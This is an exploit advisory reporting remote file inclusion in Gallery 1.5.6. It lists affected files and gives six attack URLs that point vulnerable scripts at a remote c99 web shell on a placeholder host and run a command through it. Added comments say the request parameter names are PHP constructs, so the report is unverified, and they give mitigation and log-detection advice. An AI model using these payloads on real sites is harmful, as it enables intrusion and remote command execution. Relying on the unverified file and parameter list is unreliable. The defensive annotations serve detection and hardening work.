
gallery >> 1.5.6 Remote File Inclusion






######################################################################################################################################
#gallery >> 1.5.6 Remote File Inclusion                                                                                              #
#Affected Software : gallery >> 1.5.6                                                                                                #
#Download..: http://sourceforge.net/project/downloading.php?group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343 # 
#Risk ..............: high                                                                                                           #
#Date .........: 24/4/2007                                                                                                           #
#Found by ..........: s433d_only_linux (Dr.Linux)                                                                                    #
#Contact ...........: s433d_only_linux@yahoo.de # 
#Web .............: Www.hackerz.ir # 
######################################################################################################################################
#Affected Files (as listed by the reporter; repeated entries are kept as in the original report):
gallery/lib/content.php 
gallery/lib/content.php 
gallery/lib/content.php 
gallery/lib/content.php 
gallery/setup/frame_test.php 
gallery/contrib/joomla/admin.gallery.php 
gallery/contrib/joomla/toolbar.gallery.php 
gallery/contrib/mambo/admin.gallery.php 
gallery/contrib/mambo/toolbar.gallery.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpBB2/modules.php 
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch 
########################################################################################################################################
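# Exploit (as reported):
# Note: the parameter names used in the requests below (include, require, require_once, and an
# empty name) are PHP language constructs, not request variables. The report therefore does not
# identify which variable in each file reaches the include statement. Treat the affected-file
# list as unverified until it has been checked against the gallery 1.5.6 source.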
http://[target]/gallery/lib/content.php?include=http://shellseit/c99.txt?cmd=ls 
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls 
gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls 
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls 
gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.txt?cmd=ls 
gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.txt?cmd=ls 
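# Mitigation / detection:
# PHP can include a remote URL only when URL includes are permitted (allow_url_include, or
# allow_url_fopen on PHP versions that predate that setting), so keep them disabled.
# Deny direct web access to the lib/, setup/ and contrib/ directories, which are not meant to be
# requested on their own.
# In web-server logs, requests to the paths listed above whose query string carries an
# "http://" value are the pattern to look for.
#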
#######################################################################################################################################
